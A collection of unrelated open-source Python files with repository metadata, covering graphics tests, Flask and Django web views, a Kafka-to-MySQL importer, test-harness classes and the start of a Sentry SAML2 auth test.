whole_shebang = agg.CompiledPath()
whole_shebang.save_ctm()
whole_shebang.add_path(axes)
whole_shebang.add_path(box)
whole_shebang.translate_ctm(0.0, 50.5)
whole_shebang.add_path(arc)
whole_shebang.translate_ctm(50.5, 50.5)
whole_shebang.rotate_ctm(-agg.pi/2)
whole_shebang.add_path(arc)
whole_shebang.rotate_ctm(agg.pi/2)
whole_shebang.translate_ctm(50.5, -50.5)
whole_shebang.rotate_ctm(-agg.pi)
whole_shebang.add_path(arc)
whole_shebang.rotate_ctm(agg.pi)
whole_shebang.translate_ctm(-50.5, -50.5)
whole_shebang.rotate_ctm(-3*agg.pi/2)
whole_shebang.add_path(arc)
whole_shebang.restore_ctm()
gc.set_stroke_color((1.0,0.0,0.0))
gc.set_line_width(1.0)
ctm1 = gc.get_ctm()
gc.translate_ctm(50.5, 300.5)
gc.add_path(whole_shebang)
gc.stroke_path()
gc.translate_ctm(130.5, 50.0)
ctm2 = gc.get_ctm()
gc.rotate_ctm(-agg.pi/6)
gc.add_path(whole_shebang)
gc.set_stroke_color((0.0,0.0,1.0))
gc.stroke_path()
gc.set_ctm(ctm2)
gc.translate_ctm(130.5, 0.0)
ctm2 = gc.get_ctm()
gc.rotate_ctm(-agg.pi/3)
gc.scale_ctm(1.0, 2.0)
gc.add_path(whole_shebang)
gc.stroke_path()
gc.set_ctm(ctm1)
ctm1 = gc.get_ctm()
gc.translate_ctm(150.5, 20.5)
draw_arcs(gc, 70.5, 96.5)
gc.translate_ctm(300.5, 0)
draw_arcs(gc, 160.5, 76.5, 50.0)
gc.set_ctm(ctm1)
gc.translate_ctm(120.5, 100.5)
gc.scale_ctm(-1.0, 1.0)
draw_arcs(gc, 70.5, 96.5)
gc.translate_ctm(-300.5, 100.5)
gc.scale_ctm(0.75, -1.0)
draw_arcs(gc, 160.5, 76.5, 50.0)
gc.save(save_path("arc_to.png"))
def test_arc(self):
gc = agg.GraphicsContextArray((640,648))
gc.save(save_path("arc.png"))
def test_skewing_matrix(self):
val = agg.skewing_matrix(pi/4.,pi/4.)
desired = numpy.array([ 1.0,1.0,1.0,1.0,0.0,0.0])
actual = val.asarray()
assert(numpy.allclose(desired,actual))
if __name__ == "__main__":
unittest.main()
|
tommy-u/enable
|
integrationtests/kiva/agg/test_arc.py
|
Python
|
bsd-3-clause
| 3,344 | 0.006878 |
from flask import request, flash, render_template, url_for, redirect, abort, Blueprint, g
from aalert import app, db
from flask_login import login_required, logout_user, login_user, current_user
from aalert.forms import *
from aalert.models import *
from sqlalchemy_searchable import search
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
@app.before_request
def before_request():
g.search_form = SearchForm()
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(username=form.username.data, password=form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('index'))
return render_template('register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first_or_404()
if user.is_correct_password(form.password.data):
login_user(user)
flash(u'Logged in Successfully.', 'success')
return redirect(url_for('index'))
else:
flash(u'Incorrect username/password combination.', 'error')
return redirect(url_for('index'))
return render_template('login.html', form=form)
@app.route('/', methods=['GET'])
def index():
entries = db.session.query(Info.id, Info.firstname, Info.lastname, Info.age,
Info.height,Info.last_loc, Info.missing_since)
return render_template('disp.html', entries=entries)
@app.route('/search', methods=['GET', 'POST'])
def search():
if not g.search_form.validate_on_submit():
flash(u'Incorrect format for search string.', 'error')
return redirect(url_for('index'))
return redirect(url_for('search_results', query=g.search_form.query.data))
@app.route('/search_results/<query>')
def search_results(query):
results = Info.query.search(query).limit(20).all()
if results == None:
flash('No hits. Try a different search string.')
return render_template('search_results.html', query=query, results=results)
@app.route('/logout')
def logout():
logout_user()
flash(u'Logged out successfully.', 'success')
return redirect(url_for('index'))
#admin views
admin = Admin(app, name='Amber Alert Database', template_mode='bootstrap')
class ProtectedView(ModelView):
def is_accessible(self):
return current_user.is_authenticated
def inaccessible_callback(self, name, **kwargs):
return redirect(url_for('index'))
admin.add_view(ProtectedView(Info, db.session))
|
nravic/py-amber_alert
|
aalert/views.py
|
Python
|
mit
| 2,721 | 0.005513 |
import _plotly_utils.basevalidators
class TickformatstopsValidator(_plotly_utils.basevalidators.CompoundArrayValidator):
def __init__(
self, plotly_name="tickformatstops", parent_name="contour.colorbar", **kwargs
):
super(TickformatstopsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickformatstop"),
data_docs=kwargs.pop(
"data_docs",
"""
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
""",
),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/contour/colorbar/_tickformatstops.py
|
Python
|
mit
| 2,290 | 0.000873 |
from abc import ABCMeta, abstractmethod
#Node object, important for traversing the search graph. Abstract class
#that contain abstract methods that has to be implemented by subclasses.
#These abstract methods, is what constitute the specialization of the A*
#for this problem domain.
class Node(object):
__metaclass__ = ABCMeta
def __init__(self):
self.children = []
self.parents = []
#Generate successor nodes/states from itself.
@abstractmethod
def generate_successors(self):
pass
#A getter for the heuristic. The heuristic is the estimate of the nearness to
#the goal the specific node is. In case of a distance A to B problem,
#the H is the admissable (no overestimates) distance from the goal from the nodes position.
@abstractmethod
def calc_H(self):
pass
#The actual distance from start to the node. The path cost.
def get_G(self):
return self.g
def set_G(self, cost):
self.g = cost
#Each node has to have to generate a id, to assess the uniqueness of the node.
@abstractmethod
def generate_id(self):
pass
#ArcCost from self to children. The pathcost from one node to another
@abstractmethod
def arc_cost(self, child):
pass
#If node is a solution
@abstractmethod
def is_solution(self):
pass
def add_child(self, node):
self.children.append(node)
def set_parent(self, node):
self.parents = []
self.parents.append(node)
def get_children(self):
return self.children
def get_parent(self):
#TODO: ONE PARENT?
if not self.parents:
return None
return self.parents[0]
def calc_F(self):
return self.get_G() + self.calc_H()
def get_level(self):
node = self
level = 0
while node:
node = node.get_parent()
level += 1
#Null not counted in while loop and should be subtracted
return level-1
def __lt__(self, other):
return self.calc_F() < other.calc_F()
#Representation for the GUI
@abstractmethod
def gui_representation(self, generated, popped):
pass
|
olavvatne/agac
|
abstractnode.py
|
Python
|
mit
| 2,220 | 0.009459 |
import numpy as np
from scipy.sparse import csr_matrix
from .symbolic import Operator
SPARSITY_N_CUTOFF = 600 # TODO lower after fixing sparse matrices
def sparsify(mat):
assert SPARSITY_N_CUTOFF > 5, 'The SPARSITY_N_CUTOFF is set to a very low number.'
if min(mat.shape) > SPARSITY_N_CUTOFF:
return csr_matrix(mat)
return mat
def destroy(N):
return Operator('{a}_{%d}'%N,
N,
sparsify(np.diag(np.arange(1,N,dtype=complex)**0.5,k=1)))
def create(N): #TODO name prints ugly
return Operator('{a^\dagger}_{%d}'%N,
N,
sparsify(np.diag(np.arange(1,N,dtype=complex)**0.5,k=-1)))
def num(N):
return Operator('{n}_{%d}'%N,
N,
sparsify(np.diag(np.arange(0,N,dtype=complex))))
def identity(N):
return Operator('{I}_{%d}'%N,
N,
sparsify(np.eye(N,dtype=complex)))
def randomH(N):
m = np.random.random([N,N]) + 1j*np.random.random([N,N])
m = (m + np.conj(m.T))/2
return Operator.anon(N, sparsify(m))
s_m = np.array([[0, 0 ],[1 , 0]],dtype=complex)
s_p = np.array([[0, 1 ],[0 , 0]],dtype=complex)
s_x = np.array([[0, 1 ],[1 , 0]],dtype=complex)
s_y = np.array([[0,-1j],[1j, 0]],dtype=complex)
s_z = np.array([[1, 0 ],[0 ,-1]],dtype=complex)
def sigmam():
return Operator('σ_-', 2, s_m)
def sigmap():
return Operator('σ_+', 2, s_p)
def sigmax():
return Operator('σ_x', 2, s_x)
def sigmay():
return Operator('σ_y', 2, s_y)
def sigmaz():
return Operator('σ_z', 2, s_z)
|
Krastanov/cutiepy
|
cutiepy/operators.py
|
Python
|
bsd-3-clause
| 1,593 | 0.032116 |
import os
import inspect
from lib import BaseTest
def changesRemove(_, s):
return s.replace(os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "changes"), "")
class EditRepo1Test(BaseTest):
"""
edit repo: change comment
"""
fixtureCmds = [
"aptly repo create repo1",
]
runCmd = "aptly repo edit -comment=Lala repo1"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo1", "repo-show")
class EditRepo2Test(BaseTest):
"""
edit repo: change distribution & component
"""
fixtureCmds = [
"aptly repo create -comment=Lala -component=non-free repo2",
]
runCmd = "aptly repo edit -distribution=wheezy -component=contrib repo2"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo2", "repo-show")
class EditRepo3Test(BaseTest):
"""
edit repo: no such repo
"""
runCmd = "aptly repo edit repo3"
expectedCode = 1
class EditRepo4Test(BaseTest):
"""
edit repo: add uploaders.json
"""
fixtureCmds = [
"aptly repo create repo4",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders2.json repo4"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo4", "repo_show")
class EditRepo5Test(BaseTest):
"""
edit repo: with broken uploaders.json
"""
fixtureCmds = [
"aptly repo create repo5",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders3.json repo5"
expectedCode = 1
class EditRepo6Test(BaseTest):
"""
edit local repo: with missing uploaders.json
"""
fixtureCmds = [
"aptly repo create repo6",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders-not-found.json repo6"
expectedCode = 1
outputMatchPrepare = changesRemove
class EditRepo7Test(BaseTest):
"""
edit local repo: remove uploaders.json
"""
fixtureCmds = [
"aptly repo create -uploaders-file=${changes}/uploaders2.json repo7",
]
runCmd = "aptly repo edit -uploaders-file= repo7"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo7", "repo_show")
|
neolynx/aptly
|
system/t09_repo/edit.py
|
Python
|
mit
| 2,278 | 0.000878 |
#################################### IMPORTS ###################################
from __future__ import generators
if __name__ == '__main__':
import sys
import os
pkg_dir = os.path.split(os.path.abspath(__file__))[0]
parent_dir, pkg_name = os.path.split(pkg_dir)
is_pygame_pkg = (pkg_name == 'tests' and
os.path.split(parent_dir)[1] == 'pygame')
if not is_pygame_pkg:
sys.path.insert(0, parent_dir)
else:
is_pygame_pkg = __name__.startswith('pygame.tests.')
if is_pygame_pkg:
from pygame.tests.test_utils import test_not_implemented, unittest, trunk_relative_path
else:
from test.test_utils import test_not_implemented, unittest
import pygame
import pygame._vlcbackend as gmovie
from pygame.locals import *
import os
import sys
import time
################################### CONSTANTS ##################################
filename = "War3.avi"
class MovieTypeTest( unittest.TestCase ):
def test_init(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie, True)
#screen = pygame.display.get_surface()
#movie = pygame.gmovie.Movie(filename, screen)
#self.assertEqual(movie, True)
del movie
def test_play_pause(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.playing, False)
movie.play(-1)
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
movie.pause()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, True)
movie.pause()
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
del movie
def test_stop(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.playing, False)
movie.play(-1)
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
movie.stop()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, False)
del movie
def test_rewind(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
movie.play(-1)
time.sleep(2)
#equivalent to stop without a time-argument
movie.rewind()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, False)
del movie
def test_width(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.width, 200)
del movie
def test_height(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.height, 200)
del movie
def test_resize(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
movie.play(-1)
movie.resize(movie.width/2, movie.height/2)
#equivalent to stop without a time-argument
self.assertEqual(movie.height, 100)
self.assertEqual(movie.width, 100)
del movie
|
gmittal/aar-nlp-research-2016
|
src/pygame-pygame-6625feb3fc7f/test/_vlcmovietest.py
|
Python
|
mit
| 4,005 | 0.009488 |
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from copy import deepcopy
from django import forms
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms.models import modelform_factory
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.base import MenuEntry
from shoop.admin.toolbar import Toolbar, URLActionButton, get_default_edit_toolbar
from shoop.admin.utils.views import CreateOrUpdateView
from shoop.core.models import PaymentMethod, ShippingMethod
from shoop.core.modules.interface import ModuleNotFound
from shoop.utils.multilanguage_model_form import MultiLanguageModelForm
class MethodEditToolbar(Toolbar):
def __init__(self, view_object):
super(Toolbar, self).__init__()
self.view_object = view_object
get_default_edit_toolbar(toolbar=self, view_object=view_object, save_form_id="method_form")
method = view_object.object
if method.pk:
self.build_detail_button(method)
def build_detail_button(self, method):
disable_reason = None
try:
if not method.module.admin_detail_view_class:
disable_reason = _("The selected module has no details to configure")
except ModuleNotFound:
disable_reason = _("The selected module is not currently available")
self.append(URLActionButton(
url=reverse(
"shoop_admin:%s.edit-detail" % self.view_object.action_url_name_prefix,
kwargs={"pk": method.pk}
),
text=_("Edit Details"),
icon="fa fa-pencil",
extra_css_class="btn-info",
disable_reason=disable_reason
))
class _BaseMethodEditView(CreateOrUpdateView):
model = None # Overridden below
action_url_name_prefix = None
template_name = "shoop/admin/methods/edit.jinja"
form_class = forms.Form
context_object_name = "method"
@property
def title(self):
return _(u"Edit %(model)s") % {"model": self.model._meta.verbose_name}
def get_breadcrumb_parents(self):
return [
MenuEntry(
text=force_text(self.model._meta.verbose_name_plural).title(),
url="shoop_admin:%s.list" % self.action_url_name_prefix
)
]
def get_form(self, form_class=None):
form_class = modelform_factory(
model=self.model,
form=MultiLanguageModelForm,
fields=("name", "status", "tax_class", "module_identifier"),
widgets={"module_identifier": forms.Select},
)
form = form_class(languages=settings.LANGUAGES, **self.get_form_kwargs())
form.fields["module_identifier"].widget.choices = self.model.get_module_choices(
empty_label=(_("Default %s module") % self.model._meta.verbose_name).title()
)
# Add fields from the module, if any...
form.module_option_field_names = []
for field_name, field in self.object.module.option_fields:
form.fields[field_name] = deepcopy(field)
form.module_option_field_names.append(field_name)
if self.object.module_data and field_name in self.object.module_data:
form.initial[field_name] = self.object.module_data[field_name]
return form
def get_success_url(self):
return reverse("shoop_admin:%s.edit" % self.action_url_name_prefix, kwargs={"pk": self.object.pk})
def get_toolbar(self):
return MethodEditToolbar(self)
def save_form(self, form):
self.object = form.save()
if not self.object.module_data:
self.object.module_data = {}
for field_name in form.module_option_field_names:
if field_name in form.cleaned_data:
self.object.module_data[field_name] = form.cleaned_data[field_name]
self.object.save()
class ShippingMethodEditView(_BaseMethodEditView):
model = ShippingMethod
action_url_name_prefix = "method.shipping"
class PaymentMethodEditView(_BaseMethodEditView):
model = PaymentMethod
action_url_name_prefix = "method.payment"
|
lawzou/shoop
|
shoop/admin/modules/methods/views/edit.py
|
Python
|
agpl-3.0
| 4,422 | 0.002488 |
#!/usr/bin/python
######################################################################
#
# File: kafka_to_mysql.py
#
# Copyright 2015 TiVo Inc. All Rights Reserved.
#
######################################################################
"""
Usage: kafka_to_mysql.py <kafka_topic> <kafka_broker> <mysql-ip> <mysql-port> <mysql-user> <mysql-password> <mysql_table>
"""
import json
import MySQLdb
from kafka import KafkaClient, KafkaConsumer
import sys
def usage():
print __doc__
sys.exit(1)
def main():
# R0915: "too many statements in function (>50)"
# pylint: disable=R0915
if len(sys.argv) != 8:
print "Wrong number of arguments"
usage()
(kafka_topic, kafka_broker, mysql_host, mysql_port, mysql_user, mysql_password, mysql_table) = sys.argv[1:8]
sql_db = MySQLdb.connect(
host = mysql_host,
port = int(mysql_port),
user = mysql_user,
passwd = mysql_password)
query = sql_db.cursor()
client = KafkaClient(kafka_broker)
consumer = KafkaConsumer(kafka_topic, metadata_broker_list = [kafka_broker],
auto_commit_enable = False,
auto_offset_reset='smallest')
last_offsets = {}
partition_ids = client.get_partition_ids_for_topic(kafka_topic)
for partition in partition_ids:
offsets = consumer.get_partition_offsets(kafka_topic, partition, -1, 1)
print offsets
# Don't really understand this format, so put in asserts
# (Pdb) consumer.get_partition_offsets("topicname", 0, -1, 1)
# (15471)
assert len(offsets) == 1
assert offsets[0] > 0
next_offset = offsets[0]
last_offset = next_offset - 1
last_offsets[partition] = last_offset
finished_partitions = set()
print last_offsets
count = 0
# mapping from primary key tuples, to row data
insert_batch = {}
insert_sql = None
for m in consumer:
if m.partition in finished_partitions:
continue
count += 1
payload = m.value
(first_line, rest) = payload.split("\r\n", 1)
(_notused, header_len, _body_len) = first_line.split(" ")
header_len = int(header_len)
body = rest[header_len:]
primary_key_str = m.key
# import pdb; pdb.set_trace()
primary_keys = json.loads(primary_key_str)
primary_tuples = sorted(primary_keys.items())
sorted_primary_key_names = [ k for (k,v) in primary_tuples ]
sorted_primary_key_values = [ int(v) for (k,v) in primary_tuples ]
if len(body) > 0:
# This is a write
data = json.loads(body)
# date fields have to be turned from a number back into a datetime object
date_fields = ['createDate', 'updateDate']
for d in date_fields:
if d not in data:
continue
val = data[d]
if val is None:
continue
if val == -62170156800000:
# this is hacky and a sign that i'm doing something wrong, I think.
val = "0000-00-00 00:00:00"
else:
val = val/1000
import datetime;
val = datetime.datetime.utcfromtimestamp(val)
data[d] = val
keys = [ k for (k, v) in sorted(data.items()) ]
values = [ v for (k, v) in sorted(data.items()) ]
keys_wo_primary = [ k for (k, v) in sorted(data.items()) ]
for p in sorted_primary_key_names:
keys_wo_primary.remove(p)
# e.g.
# insert into dbname.tablename (col1, col2) values (%s, %s) on duplicate key update col2 = values(col2)
# assuming that col1 is the primary key
insert_sql = """insert into %s """ % mysql_table
insert_sql += """ (%s) """ % (", ".join(keys))
insert_sql += " values (%s) " % (", ".join(["%s"] * len(values) ))
insert_sql += "on duplicate key update "
insert_sql += ", ".join(["%s = values(%s)" % (k, k) for k in keys_wo_primary ])
insert_batch[tuple(primary_tuples)] = tuple(values)
if len(insert_batch) > 5000:
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
else:
# This is a delete
if len(insert_batch) > 0 and insert_sql is not None:
# flush all writes before processing any deletes
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
# get the primary keys, and delete the row
where_clause = ' and '.join([ "%s = %%s" % k for k in sorted_primary_key_names ])
# e.g.
# delete from dbname.tablename where field1 = %s and field2 = %s
delete_sql = """delete from %s where %s""" % (mysql_table, where_clause)
values = tuple(sorted_primary_key_values)
query.execute(delete_sql, values)
sql_db.commit()
# how do I know when to stop?
print "Partition %d Offset %d of %d" % (m.partition, m.offset, last_offsets.get(m.partition))
if m.offset >= last_offsets.get(m.partition):
finished_partitions.add(m.partition)
if len(finished_partitions) == len(last_offsets):
# All partitions are done.
break
if len(insert_batch) > 0:
# flush any remaining writes
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
print "Imported %d messages into mysql" % count
if __name__ == "__main__":
main()
|
TiVo/wombat
|
correctness/kafka_to_mysql.py
|
Python
|
apache-2.0
| 5,895 | 0.008142 |
# -*- coding: utf-8 -*-
from PyQt4 import QtGui, uic
import os
#from qgis.utils import iface
FORM_CLASS, _ = uic.loadUiType(os.path.join(os.path.dirname(__file__), 'padrohabitants_dialog.ui'))
class PadroHabitantsDialog(QtGui.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(PadroHabitantsDialog, self).__init__(parent)
# Set up the user interface from Designer.
# After setupUI you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
# set icons and tooltips to the buttons
#self.center_PButton.setIcon(iface.actionPanToSelected().icon())
|
psigcat/padrohabitants
|
plugin/ui/padrohabitants_dialog.py
|
Python
|
gpl-2.0
| 844 | 0.007109 |
#!/usr/bin/env python
#
# Author: Veronica G. Vergara L.
#
#
from .scheduler_factory import SchedulerFactory
from .jobLauncher_factory import JobLauncherFactory
from abc import abstractmethod, ABCMeta
import os
import shutil
class BaseMachine(metaclass=ABCMeta):
""" BaseMachine represents a compute resource and has the following
properties:
Attributes:
name: string representing the system's name
scheduler: an object of the BaseScheduler class
jobLauncher: an object of the BaseJobLauncher class
Methods:
get_machine_name:
print_machine_info:
print_scheduler_info:
print_jobLauncher_info:
set_numNodes:
"""
def __init__(self,name,scheduler_type,jobLauncher_type,numNodes,
numSockets,numCoresPerSocket,rgt_test_input_file,workspace,
harness_id,scripts_dir):
self.__name = name
self.__scheduler = SchedulerFactory.create_scheduler(scheduler_type)
self.__jobLauncher = JobLauncherFactory.create_jobLauncher(jobLauncher_type)
self.__numNodes = numNodes
self.__numSockets = numSockets
self.__numCoresPerSocket = numCoresPerSocket
self.__rgt_test_input_file = rgt_test_input_file
self.__rgt_workspace = workspace
self.__rgt_harness_id = harness_id
self.__rgt_scripts_dir = scripts_dir
self.set_rgt_results_dir()
def print_machine_info(self):
""" Print information about the machine"""
print("Machine name:\n"+self.get_machine_name())
self.__scheduler.print_scheduler_info()
print("Job Launcher info: ")
self.print_jobLauncher_info()
def get_machine_name(self):
""" Return a string with the system's name."""
return self.__name
def get_rgt_workspace(self):
""" Return a string with the path to the workspace."""
return self.__rgt_workspace
def create_rgt_workspace(self):
""" Create a workspace for this test instance."""
os.makedirs(self.get_rgt_workspace())
return
def get_rgt_input_file_name(self):
""" Return a string with the test input file name."""
return self.__rgt_test_input_file
def get_scheduler_type(self):
""" Return a string with the system's name."""
return self.__scheduler.get_scheduler_type()
def get_scheduler_template_file_name(self):
""" Return a string with the name of the scheduler's template file."""
return self.__scheduler.get_scheduler_template_file_name()
def submit_to_scheduler(self,batchfilename,unique_id):
""" Return the jobID for the submission."""
submit_exit_value = self.__scheduler.submit_job(batchfilename)
write_job_id_exit_value = self.__scheduler.write_jobid_to_status(unique_id)
return submit_exit_value and write_job_id_exit_value
def build_jobLauncher_command(self,template_dict):
""" Return the jobLauncher command."""
return self.__jobLauncher.build_job_command(template_dict)
def start_build_script(self,buildscriptname):
""" Return the status of the build."""
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
(dir_head1, dir_tail1) = os.path.split(currentdir)
(dir_head2, dir_tail2) = os.path.split(dir_head1)
path_to_source = os.path.join(dir_head2,"Source")
print("Path to Source: ",path_to_source)
self.create_rgt_workspace()
path_to_build_directory = os.path.join(self.get_rgt_workspace(),"build_directory")
print("Path to Build Dir: ", path_to_build_directory)
shutil.copytree(path_to_source,path_to_build_directory)
os.chdir(path_to_build_directory)
print("Starting build in directory: " + path_to_build_directory + " using " + buildscriptname)
build_exit_status = os.system(buildscriptname)
os.chdir(currentdir)
return build_exit_status
def check_results(self,checkscriptname):
""" Run the check script provided by the user and log the result to the status file."""
jstatus = self.start_check_script(checkscriptname)
self.write_check_exit_status(jstatus)
def start_check_script(self,checkscriptname):
""" Check if results are correct. """
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
os.chdir(self.get_rgt_results_dir())
print("Starting check script in base_machine: ",os.getcwd())
path_to_checkscript = os.path.join(self.get_rgt_scripts_dir(),checkscriptname)
print("Using check script: ",path_to_checkscript)
check_exit_status = os.system(path_to_checkscript)
os.chdir(currentdir)
return check_exit_status
def write_check_exit_status(self,jstatus):
""" Write the status of checking results to the status directory."""
(dir_head1, dir_tail1) = os.path.split(self.get_rgt_results_dir())
(dir_head2, dir_tail2) = os.path.split(dir_head1)
file1 = os.path.join(dir_head2,"Status",dir_tail1,"job_status.txt")
file1_obj = open(file1,"w")
print("Writing check_exit_status = ",jstatus," into ",file1)
# Set the string to write to the job_status.txt file.
#if jstatus == 0:
# pf = "1"
#elif jstatus == 1:
# pf = "0"
#elif jstatus >= 2:
# pf = "2"
string1 = "%s\n" % (jstatus)
file1_obj.write(string1)
file1_obj.close()
def start_report_script(self,reportscriptname):
""" Check if results are correct. """
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
report_exit_status = os.system(reportscriptname)
os.chdir(currentdir)
return report_exit_status
def get_rgt_harness_id(self):
""" Return the string with the Harness ID for this test instance."""
return self.__rgt_harness_id
def set_rgt_results_dir(self):
""" Return the string with the path to the Run_Archive/Harness ID directory."""
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
(dir_head1, dir_tail1) = os.path.split(currentdir)
self.__rgt_results_dir = os.path.join(dir_head1,"Run_Archive",self.get_rgt_harness_id())
return
def get_rgt_results_dir(self):
""" Return the string corresponding to the path to the Run_Archive directory."""
return self.__rgt_results_dir
def get_rgt_scripts_dir(self):
return self.__rgt_scripts_dir
def get_rgt_workdir(self):
""" Return the string with the path to the Run_Archive/Harness ID directory."""
return os.path.join(self.get_rgt_workspace(),"workdir")
def print_jobLauncher_info(self):
""" Print information about the machine's job launcher."""
print("Job Launcher Information")
print(str(self.__jobLauncher))
def set_numNodes(self,numNodes):
self.__numNodes = numNodes
@abstractmethod
def read_rgt_test_input(self):
if os.path.isfile(self.get_rgt_input_file_name()):
print("Reading input file")
else:
print("No input found. Provide your own scripts")
@abstractmethod
def make_batch_script(self):
print("I'm making a batch script in the base class")
return
@abstractmethod
def submit_batch_script(self):
print("I'm submitting a batch script in the base class")
return
if __name__ == "__main__":
print("This is the BaseMachine class!")
|
verolero86/ooh-py
|
base_machine.py
|
Python
|
mit
| 7,770 | 0.007336 |
from django.core.urlresolvers import reverse
from rest_framework import serializers
from casenotes.api import CaseNoteSerializer
from .. import models
class ViewTicketSerializer(serializers.ModelSerializer):
case_note = CaseNoteSerializer()
claim_url = serializers.SerializerMethodField()
resolve_url = serializers.SerializerMethodField()
assigned_to = serializers.SlugRelatedField(slug_field='username', read_only=True)
def get_claim_url(self, obj):
return reverse('ditto:ticket_claim', args=(obj.pk,))
def get_resolve_url(self, obj):
return reverse('ditto:ticket_resolve', args=(obj.pk,))
class Meta:
model = models.Ticket
fields = (
'id',
'claim_url',
'resolve_url',
'created_at',
'assigned_to',
'is_resolved',
'case_note',
)
|
Kvoti/ditto
|
ditto/tickets/api/serializers.py
|
Python
|
bsd-3-clause
| 900 | 0.004444 |
from __future__ import absolute_import
import six
import pytest
import base64
from sentry.utils.compat import mock
from exam import fixture
from six.moves.urllib.parse import urlencode, urlparse, parse_qs
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from sentry.auth.authenticators import TotpInterface
from sentry.auth.providers.saml2.provider import SAML2Provider, Attributes, HAS_SAML2
from sentry.models import (
AuditLogEntry,
AuditLogEntryEvent,
AuthProvider,
Organization,
)
from sentry.testutils import AuthProviderTestCase
from sentry.testutils.helpers import Feature
from sentry.utils.compat import map
dummy_provider_config = {
"idp": {
"entity_id": "https://example.com/saml/metadata/1234",
"x509cert": "foo_x509_cert",
"sso_url": "http://example.com/sso_url",
"slo_url": "http://example.com/slo_url",
},
"attribute_mapping": {
Attributes.IDENTIFIER: "user_id",
Attributes.USER_EMAIL: "email",
Attributes.FIRST_NAME: "first_name",
Attributes.LAST_NAME: "last_name",
},
}
class DummySAML2Provider(SAML2Provider):
def get_saml_setup_pipeline(self):
return []
def build_config(self, state):
return dummy_provider_config
@pytest.mark.skipif(not HAS_SAML2, reason="SAML2 library is not installed")
class AuthSAML2Test(AuthProviderTestCase):
provider = DummySAML2Provider
provider_name = "saml2_dummy"
def setUp(self):
self.user = self.create_user("rick@onehundredyears.com")
self.org = self.create_organization(owner=self.user, name="saml2-org")
# enable require 2FA and enroll user
TotpInterface().enroll(self.user)
self.org.update(flags=models.F("flags").bitor(Organization.flags.require_2fa))
assert self.org.flags.require_2fa.is_set
self.auth_provider = AuthProvider.objects.create(
provider=self.provider_name, config=dummy_provider_config, organization=self.org
)
# The system.url-prefix, which is used to generate absolute URLs, must
# have a TLD for the SAML2 library to consider the URL generated for
# the ACS endpoint valid.
